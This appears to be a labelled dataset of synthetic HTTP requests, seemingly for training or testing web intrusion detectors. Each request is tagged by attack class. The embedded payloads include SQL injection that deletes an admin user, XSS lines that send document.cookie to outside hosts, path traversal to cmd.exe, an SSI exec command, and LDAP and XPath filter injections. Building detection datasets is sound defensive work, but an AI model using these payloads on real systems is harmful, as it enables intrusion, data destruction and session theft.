If-None-Match: "bU@@f.t0ewrBy71_H"
If-Range: "DZ70iyTX.ylRK0e9Dy8t"
Max-Forwards: 2
Pragma: no-cache
Authorization: eyyd nnfs=udsi
Referer: http://www.zsis.fr/otob.tar.gz
TE: trailers,trailers
User-Agent: tR0V6o http://www.isgvxsNf.de
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8766x859
Via: FTP/9.3 19.196.17.175, FTP/5.9 178.93.198.68:8979, 9.2 47.193.39.147
Transfer-Encoding: identity
X-Forwarded-For: 34.122.30.225

zLhFM4OebftpN=ftt&sBr6mog0uacsvea=lhI)(    |  (rtuw=*)&sandxtermC=os0yeueotnwfelAf

End - Id: 37708
Start - Id: 38712
class: LdapInjection
GET /oxe4SrGsk9NG-NK2D/pin5p/OvKobjectTwkXsNyeWdimg/rtrfae0/iuPf6Cg6553tG/NTT.wfopen/5Yqj1vppaDv1R_JkMAF/ae0tm8tsle/3atwgas2U/rqkwQxA42NLg6yiXbq51.js?qdes2b7tk=t%2B5sa&poio6iexh0hemoe=201100&1t=alhas3+&ZewmetaDP=x6ea&4asystoootDg=ogeoewindow.openwhere%40p%29%40gnr3RS&UrrraLlfuetio=35&8usnUoG=323&tbiekltkbcuE=6967&linkO.8Jj1A=291582&4emd=nQmX&eolimt65ep0s=%29%28++%7C+%28i8yv%3Dnmhla*%29 HTTP/1.0
Host: 179.35.212.34
Connection: widoc
Accept: */*
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: e5zr-pl, 8h7k-9M;q=0.6, olsgcao-enro, osofls-o, o-gue
Cache-Control: max-age=05476
Client-ip: 95.161.31.177
Cookie: nae0aayE4iMirNr=6;rHK3LF=gBl;spnteiIseyn0cn=9ncMqadt9ahmn;rcp9copyKr=sdocument:;trodnthnroTsyi=8518751111;etwgtEr6utb6cl=3n
Cookie2: $Version="7"
Date: Wed, 14 Oct 09 08:35:50 GMT
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Wed, 30 Nov 05 07:29:32 UTC
If-Unmodified-Since: Wed, 12 Oct 05 07:51:59 UTC
If-Match: "bUEMNSvpAnphiU4zRZb"
If-None-Match: *
If-Range: Sun, 18 Apr 04 13:08:26 UTC
Max-Forwards: 201
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: Basic dmF6NWhzOncyZW9ldDc=
Range: 557810-
Referer: http://Ofielut.be/4tasc3/rsiwc/tsm9ire/P8mCap.avi
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.2 (Windows; U; Win98 2.1; lt-nn; rv:9.4.8) Gecko/90304344
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/7.2 www.euAe.shtml, HTTP/6.7 72.200.125.131:6
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38712
Start - Id: 42148
class: SqlInjection
GET /oRmbmKY/6lJOsEWhdsxeAPfRl/e1.Bjr4S/o6SHXoge0MzeTRQhSF/CRa8gXnodeAinclude2Rc/ikeaRhsXs/iGl/o3fyt6ZE0XENHW78/nipZ5w/agroue5dS7icsacEn/owMYzWPJ/h8EP.png?zwd=onibijnasehabchild&ftpvqoaC1=2300090422&eow=7i&gmdrmseiooiho=wsehred&cDsf=4882590&otgoaLiMgAo=s7ior4nlmrizhnhvt&IadWoDTWjMw=eq%26sao&weDyMh9ottns=1&t6hrEezdemc4nh=ins4&a9=099184107&MTStxkvbscriptTpFi=Osssuae%27+++%29%3B++++DELETE++++FROM+++users+++WHERE++upper%28username%29+++%3D++upper%28++++%27admin HTTP/1.1
Host: 226.185.141.57
Connection: eaajceew
Accept: */*
Accept-Charset: iso-8859-8;q=0.7, x-mac-korean
Accept-Encoding: *
Accept-Language: my-aHaa5e
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: h5RegDhnua=o8y3lbsttgji2st~r;tun=i6s3R9L
Cookie2: $Version="903"
Date: Mon, 22 Oct 07 22:58:48 UTC
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Thu, 16 Jun 05 06:24:24 UTC
If-Unmodified-Since: Tue, 08 Apr 08 12:43:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: ki=hAeop
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /s9xc/iurw/ttsaaej1/tkUy/yseU.gz
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/9.0 (X11; U; SunOS sun4u 4.5; oe-fp; rv:7.6.1) Gecko/72381452
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/7.8 203.237.173.224:14, 0.2 www.npizcqp.css:66794, FTP/9.6 www.BJdA4t.jpeg
Transfer-Encoding: gzip
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42148
Start - Id: 47980
class: XSS
GET /64ia8c4wo.jsp?nen=i%7Cy&GFbbetweenl=5141092099&jepzn9=naCDRmkCSl&S5Ecq9=%3A&En0-mocha=57&seinrxernev=%3Cstyle+++++type+++%3D+%22++++text%2Fjavascript++++%22%3E%5Bwindow.open%28%27http%3A%2F%2F6.114.241.110%2Forrola.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle++%3E&icMJL8eLf=eer&To=399&uTeerehg=76834 HTTP/1.0
Host: 235.149.96.235
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: rrajHoEs-simterem, ieeC-meecehr;q=0.2, pan4fhw-bie9r
Cache-Control: no-cache
Client-ip: 235.206.209.30
Cookie: B40Un3FH3=3Nnli;qlnn=eneo
Cookie2: $Version="0"
Date: Mon, 28 Jan 08 11:28:24 GMT
ETag: W/".PIa5x900H8gqvCc"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 14 May 04 10:06:30 UTC
If-Unmodified-Since: Thu, 22 Jun 06 21:32:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic RGRldWVhOmRzek45
Range: -4,8-
Referer: /D1av4sb/syheefx/OrHm7es/aleeuesn/n8sr8si2.aspx
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: eDF3ET0e http://www.ohoe5.cz
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 2.0 96.103.10.196, HTTP/7.7 194.94.15.215, FTP/9.1 31.201.81.96
Transfer-Encoding: gzip
Upgrade: j4z/6.4, aetn/7.6, nyot4w/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47980
Start - Id: 39075
class: LdapInjection
PUT /aqYLC5gn_WKvfWn8WQ/of0vmXea4/tj8Z07D/6QcdLeZ4/l_ovMS6-npLrfAH6DqB/n0h/ZmiwldohSRttDb/aeUGc2O/ixvlw7YDsbfdq/a5.nsf? HTTP/1.1
Content-Length: 62
Content-Language: gNA,eEpunh
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Nov 07 05:54:41 CET
Last-Modified: Mon, 10 Aug 09 03:54:19 UTC
Host: www.2tolidHtko.st
Connection: keep-alive
Accept: audio/basic;q=0.0, image/gif
Cache-Control: max-age=3241
Cookie: xt6bsriilzsii=")(targetfilter=(o=NetscapeRoot))
Date: Wed, 23 Nov 05 10:19:35 UTC
If-Modified-Since: Tue, 12 Sep 06 05:23:15 CET
If-Match: *
If-Range: Sun, 20 Jan 08 23:17:56 UTC
Max-Forwards: 7
Pragma: no-cache
Authorization: Digest uri=/Ao9e/edail/eedS/atex.jpg
Referer: /oipt/tbadf/DsI6/ysismh.jpeg
User-Agent: Mozilla/5.5 (X11; U; Linux i586 0.2; oa-eb; rv:4.2.6) Gecko/32337199
Transfer-Encoding: to7wu; itkdodit=ptldaOnr
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PGr-nOperlQGR0cat=452103&s9e1ftYrto=8soo=I/ttp&mItat=2odgh

End - Id: 39075
Start - Id: 49420
class: XPathInjection
GET /oP@4ITeXQ1P/rfrdwiffspwhamnsefua/chc8edorsesof7Rd0a/ssrtso/uoenaccriafoeN0E/rTEkOLQB_E/tWo.Iq_bppHD.x/zaNmxIetlBAebo/latfty6wtkwsfeycR7o/bksIoSBOp0RLvLQtl/otkTmw2xs8u.jpg?i2Qoh7i4efhnhe=%2B6&eioclttjeEnrae=+nc&geaajatnay8ph=ap&ptsruI=0317&eosawefetdgeR=trmt%2Fa88tia%2F5n%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D430%5D+++or++%27IJItherc%27+%3D+++%27&MqBajAZv2YlocationS=whrohMtatIil&ojn=eaAoxr5ae8IiSh&hqahn=ao%5CDe%3Brcp+foe+e HTTP/1.0
Host: www.5otebAojrq.cz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: No-hitens, aan8beeb-Imes;q=0.3, thhedO-r7, Tthstzei-h, oaelqsi7-frEa;q=0.8
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Sun, 19 Aug 07 10:33:45 CET
ETag: W/"yBi@1NQdLHx8ApZv.y"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: *
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: "Mu-7L2kBKqVbrZs"
Max-Forwards: 5
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: shsc oibhofls=76ht5dn
Authorization: Digest nc=A74a4Ae1
Range: 77585-376599
Referer: http://www.5isnS.com/tlt13/ntogptlt/GC18/yzmnh0ab/ew4nj.png
TE: gzip,chunked,deflate;q=0.7
Trailer: Warning
User-Agent: Mozilla/9.2 (compatible; hNoi; Linux i586; snnrtr6; flSeAr; bfnteciena)
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 8.4 191.223.218.165:1907, FTP/3.1 www.tHc9Nw.js
Transfer-Encoding: gzip
Upgrade: nostnl/9.9, gueoi/6.9, Nceiet/2.3, aiOs/0.5, fiuA/5.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 222.117.148.160
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49420
Start - Id: 46766
class: XSS
POST /aluYK/gr6AXV-1pFservices/cseshecige3c8ymasdi/hat/opt%uVZ@encY/xzL..2Ta5/dwvMxkpqO@s3l/f7mohfrom/lzZxhkru87C8o3ajfyl4.gif? HTTP/1.1
Content-Length: 242
Content-Language: AcaCea8
Content-Encoding: gzip
Content-Location: http://wmbetsao.ch/srra/cpeeows/imtft/tNh9av/etnI9.jpg
Content-MD5: N2NwZThlZW54aWhzVHJpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 10:02:06 UTC
Last-Modified: Mon, 31 Jan 05 16:26:38 GMT
Host: 172.195.234.201
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: utf-7, iso-2022-jp;q=0.1, cp-932;q=0.6, euc-kr, windows-1257
Accept-Encoding: *
Accept-Language: hiIe-neoo;q=0.4, b-Bwsti7, mw4E-lituats4;q=0.7
Cache-Control: max-stale
Client-ip: 202.152.82.23
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="4"
Date: Sun, 08 Feb 04 24:25:49 CET
ETag: "uvWwqLBwApGZcIhP"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Oct 09 09:58:38 GMT
Max-Forwards: 5091
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: e7zii lLnlii4h=jeo1mtj
Range: -03,-42983
Referer: http://inqmdh.uk/ndannp/sdoirr.rar
TE: deflate;q=0.5,gzip,deflate;q=0.7
User-Agent: Mozilla/2.7 (X11; U; Unix 6.5; re-8A; rv:7.1.0) Gecko/42882136
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: deflate
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"
X-Forwarded-For: 183.74.153.68
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1VWwindow.open2gI=uWiey2Bgyjrie%tclibg&tdroehudenoq=45129&escittaerEiqb=mYso1hshyEohlda&Aiateh=4&hi9hs=61&vdEao=aCvx3Y.xd&eneoetpmltbEyno=<div  style=   "    width:     expression([alert  ('iplnc');]);   "  >

End - Id: 46766
Start - Id: 41577
class: SqlInjection
GET /allhRgAEimwhere8passthruFZservices/khozugOwe/1L0htpassO1p2WRA/utsaiut/bc1y41y0avmghjqglt/Weqm2noUQoeecgodz/jnQw7/nnM9Xu/ilognahETgRk.htm?athurt=du%40s&umUffoea=dtdhDeqdlh%3Eh4node&welff=i+nE&ey=%25&eaief8rlureYakU=nluc&StlimLc=5&bdens0oEnyst=Atp&Ulogexml5Iqlocationg=%27+%2B++++%28++++SELECT+TOP++++1+3wsu+++++FROM+++esrrpo%29+++%2B+%27&Etelnetdoeh=+jnaitrUovusqth%3E&nrxQF5s=hY5E&ktrolr=115411&ugeerl=9288707712&lt=0699&Ozpere=bdrj HTTP/1.0
Host: 11.113.186.227
Connection: keep-alive
Accept: video/mpeg;q=0.3
Accept-Charset: iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: esmmn-ftrg;q=0.3, h-n9i;q=0.1, pLcn-ecasHoNv
Cache-Control: only-if-cached
Client-ip: 237.68.176.239
Cookie: hStT5g=jY2J1;Oethrashnawo=i-nadminsswiframeeaallsnfk;tj3ucsdrleedd=erri;yu@LK2Zn.40G=3qC0V6n7js;systemZeY=n krntn;tbtea=d549@CUi4
Cookie2: $Version="8"
Date: Wed, 27 Jun 07 02:01:29 UTC
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Fri, 07 Mar 08 22:23:14 GMT
If-Unmodified-Since: Fri, 02 Oct 09 06:03:52 UTC
If-Match: *
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Wed, 30 Nov 05 03:35:24 GMT
Max-Forwards: 98
MIME-Version: 3.1
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: /clslet.gif
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.4 (X11; U; Linux i386 5.5; sd-tt; rv:2.3.9) Gecko/67802752
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 2.8 116.214.112.149, 1.1 102.182.25.191:36362, 8.1 www.rIlb.jpeg
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41577
Start - Id: 44253
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Hdm9yn.net
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: so-rAsi, Il-ooNke;q=0.0, uerete-tcyeu;q=0.3
Cache-Control: Acwta='nncutitc'
Client-ip: 182.20.30.117
Cookie: ST5RZh-i6q=8116996
Cookie2: $Version="03"
Date: Wed, 29 Oct 08 08:09:52 UTC
ETag: "tuLT6v@wLJeEsjmz"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 23 Feb 04 07:34:07 GMT
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Aug 05 09:26:38 UTC
Max-Forwards: 851
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /rkiilout.html
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 8.6; Ch-fe; rv:3.0.2) Gecko/37906006
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: 6.4 139.96.205.198:8
Transfer-Encoding: deflate
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44253
Start - Id: 47062
class: XSS
GET /zhIRRFrGb/dhleeeuDrd3sd.sh?NI0Srfqoea=iee&Xct1neagoevoe=+to&EReh5brO=n0a2lnhfp&hJniHmshwhse=32005057&3ugOtn1=os%3Dyud2Haf%24id&iefo=ms5tk2mhnem9i&lQLCOLSR8EL=at%5Ca&3Xpdo=96015505&arAbs1iloD6t=ahy&mnPyj=idss%3Exsn%3Cn+enull&CeSc8connectxmliT=al%3Fh3trsmleIP&vjgZtr-1KVP=%3Cimg+++++src++++%3D++%22+++++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.sive.com%2Fcgi-bin%2Fnticalnine.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.0
Host: 130.10.193.126
Connection: hhjaio
Accept: application/rtf, application/*, application/*
Accept-Charset: windows-1253
Accept-Encoding: deflate;q=0.4, gzip;q=0.3, identity;q=0.1, deflate;q=0.7, deflate;q=0.4
Accept-Language: Seo-6tsiErs;q=0.9, Tneaweoa-rgupi;q=0.0, edu-xW
Cache-Control: only-if-cached
Client-ip: 127.63.46.215
Cookie: j3saot=oocxsnSisohn3T
Cookie2: $Version="08"
Date: Sat, 01 Mar 08 12:53:48 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: upMalngr@beooie.cz
If-Modified-Since: Tue, 21 Mar 06 15:13:26 CET
If-Unmodified-Since: Mon, 18 Jan 10 24:41:25 UTC
If-Match: "h4JzSI9EN93fI6G58g"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 645
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 53-8432
Referer: http://vQoteyyh.biz/wlsnfs/bopybr.swf
TE: trailers,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 3.0; os-la; rv:8.1.6) Gecko/29585556
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 1.2 63.32.107.4
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47062
Start - Id: 40286
class: SSI
GET /a_kc/kIjoptTm/roqO/jWG7T9lODoAXi/nidgfc/peunoe1fCS9cohiHce6.jpg?8homeI@8HEYwl=33934&cf=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5C4A%5CmidnakItn%5Ctrezauni.exe+++++d%3A%5Cnh4sziqt%5Cwww.almeol.org%5Claacrh2ia%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E&ntnirioe=0906694987 HTTP/1.1
Host: 46.38.98.253
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.6, compress;q=0.4, gzip
Accept-Language: sSCascN-o3azr, WR-akteA;q=0.5, trsN-edterco
Cache-Control: no-store
Client-ip: 96.240.98.126
Cookie: sv=35947383;zeisensisir=yuace7mfhuct4dbst1;hgaisieEcqsl=1755;dtgtWCmt=jNdmgEvp;1er9=senaiacrr6tf;tfnrttthinrt=hsamenwfromaTbetweenOepyon 
Cookie2: $Version="976"
Date: Thu, 08 Sep 05 08:36:06 CET
ETag: W/"ADBuQO9tIlPS2mf"
Expect: glFeoe
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 21 Jul 07 03:57:47 GMT
If-Match: "_@HsKmpnxKATySdtY"
If-None-Match: "HMbRdr-E9-kscoXdXZ4"
If-Range: *
Max-Forwards: 393
MIME-Version: 9.5
Pragma: s9lyr=u
Proxy-Authorization: NTLM bzZlZ3Bvbm0xdHRoaWZHYWFjaWVtYTZsb2VxYm13d0R0OWVwb2ZpT2Ju
Authorization: Digest nonce
Range: 37574-,839789-
Referer: /iaryftRp/oeniei/tnti.dll
TE: chunked;q=0.9
Trailer: Authorization
User-Agent: Mozilla/2.5 (compatible; Konqueror/8.7; SunOS sun4u; jpaegEht; LoaF; 4i5yahondu)
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2184x777
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: 9bitgr; atus=xavAdux
Upgrade: rdr/9.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
X-Serial-Number: 62707296438769057176
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40286
Start - Id: 49046
class: XPathInjection
GET /gOaSfljt4tfta9fNataW.bin?4insertVOp=t&ieap=346996&tnSs=%25uv5eNrmoru&aifdEaie7dhgasm=4009348&k0zlt=alogditbH&eisru8uAroe7tAN=rhunUdem%27+++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i++%2B++j+++%2Bk%2B++++l++%2B+++1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++%27ct%27+%3D++%27+++++tzhta%27+++++or&ttliahyt=aY4YnjLw6OC1&pCaNbrhrpn9a=jn&To=p8a&wIHtgzze=e7el%3B+m+yiautoexecksnia2xml&havingwwjusr74me=lQJG&dia2=nelzIicwosL&YCgGU4ghST=2Rt3l.2dE3w2&F.Fi=aes+passwd HTTP/1.0
Host: www.eoES.org
Connection: EAne
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: uxe67aweHby=3y790S;@bxmlPG_7Q=7510;lenteshuAuec=hmfQAMQ;dufhhg=18794467;ty8fiJBLjp=ett  h wp-@t;m2t4nHncteb=3dtit4NnO
Cookie2: $Version="82"
Date: Thu, 05 Mar 09 09:21:04 GMT
ETag: W/"dwN6Vk-O63jtboyt"
Expect: 100-continue
From: omlrams@dneneIeea.de
If-Modified-Since: Wed, 24 Sep 08 13:36:31 UTC
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: "VUBUpy7M01_GDlaK7"
If-None-Match: "fxauJTjPJedHzYc"
If-Range: Tue, 23 Jun 09 05:26:09 CET
Max-Forwards: 3681
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /8iGed7te/eondfrt/nemi3/gUgfots/Ehtneh7o.avi
TE: deflate,gzip
Trailer: Referer
User-Agent: noSsideAwo (aGI90IQ)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/5.3 www.tpreaxd6.css, FTP/6.0 www.vo51hnn.jpg
Transfer-Encoding: iisc
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 398 210.174.40.66 "iaesbh" 
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49046
Start - Id: 37079
class: LdapInjection
GET /1TYgon6dbYtGas/eiaU5PoTq2-9U/sEqW_hXIuh8UREAR0/ogCxoiriBnf9AyW3M13/ys/c9auiaspattntwdxes/icZPME.DmR5d/hd4dOT.gif?11Hi4tkIudoh=t8m%5De&dotyftuStetgfs=mljl%29%28++%7C++++%28aotai%3D*%29&rqagmwPqa=Aubedndosim HTTP/1.1
Host: 90.63.79.131:06741
Connection: close
Accept: image/jpeg;q=0.7, video/quicktime, application/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: fenzgt-ie;q=0.0, daverle8-trl, tEHel-nEs80Bat;q=0.9, 6dstlObk-sw
Cache-Control: dattaisf='9'
Client-ip: 155.64.137.82
Cookie: oaaoGo3a=enFsfxa;ed8pi=79;geNlrolut=630000523;lauee=$hdrmlqnph-6;cenodeurll7etjR=h4deletedrcphhsemewdo%4lc;0niis30ae9OhtLn=0195800899
Cookie2: $Version="222"
Date: Sun, 24 Jan 10 05:00:13 CET
ETag: "Qo5vB6y78EBMnbaX9j.Q"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Thu, 31 Mar 05 17:42:23 GMT
If-Unmodified-Since: Wed, 16 Jun 04 09:44:49 CET
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 99
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic c2V3aWM6TmFhc2U=
Range: -5
Referer: http://ibrtct.be/oCth/mdnTd0hy/e7titr5/aeehii/0reunev.js
TE: deflate;q=0.1,trailers,trailers
Trailer: From
User-Agent: Mozilla/4.6 (Windows; U; WinNT 6.5; iU-rc; rv:1.5.3) Gecko/30910428
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: 8.8 28.250.128.72, 8.2 206.243.230.150, 4.1 194.218.72.108
Transfer-Encoding: compress
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 4.45.247.215
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37079
Start - Id: 47733
class: XSS
GET /Q9UWbhbBLpositionXZRl/9zpO8AABX/sDzv@80VbEfSb/ezlqUmXD4yL.png?emeleEetdeN=ojt++onload%3Djavascript%3A++alert+++%28oatdmmn.uit%29&mogrkea=eaistuc1A1e0&zssE8=8&q7eWynert9Etp=Co4oojTa&abg=o5%28parPineOonr%2F&nmnrs9rlIs=2tAlcshutdownewcl HTTP/1.0
Host: 130.89.125.107:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: ape-nsna2Ud;q=0.7, r-yw00, i-nugr, O7soae-t;q=0.7
Cache-Control: no-store
